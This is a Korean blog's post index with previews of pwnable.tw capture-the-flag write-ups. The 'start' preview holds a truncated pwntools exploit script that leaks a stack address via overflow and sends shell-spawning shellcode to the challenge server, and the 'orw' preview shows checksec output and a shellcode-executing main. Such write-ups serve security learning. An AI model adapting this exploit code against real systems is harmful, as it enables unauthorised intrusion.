전체 글 (187) 썸네일형 리스트형 [pwnable.tw] start from pwn import * context.lo_level = "debug" p = remote("chall.pwnable.tw", 10000) #p = process("./start") ret = 0x0804809c main = 0x08048087 leak = b"A" * 0x14 leak += p32(main) #leak += p32(ret) p.recvuntil(b":") p.send(leak) sleep(0.1) shell_addr = u32(p.recv(4)) log.info("shell code addr: " + hex(shell_addr)) shell = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\.. [pwnablw.tw] orw checksec Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments description int __cdecl main(int argc, const char **argv, const char **envp) { orw_seccomp(); printf("Give my your shellcode:"); read(0, &shellcode, 0xC8u); (shellcode)(); return 0; } 쉘코드를 받고 실행시켜 줍니다 seccomp이 걸려있어 rule을 확인해보면 open, read, write이 열려 있어서 문제 이름처럼 orw .. 볼꺼 4 보호되어 있는 글입니다. 볼꺼3 보호되어 있는 글입니다. dd 보호되어 있는 글입니다. 볼꺼2 보호되어 있는 글입니다. 볼꺼 보호되어 있는 글입니다. 2022 회고록 보호되어 있는 글입니다. 이전 1 2 3 4 5 6 7 8 ··· 24 다음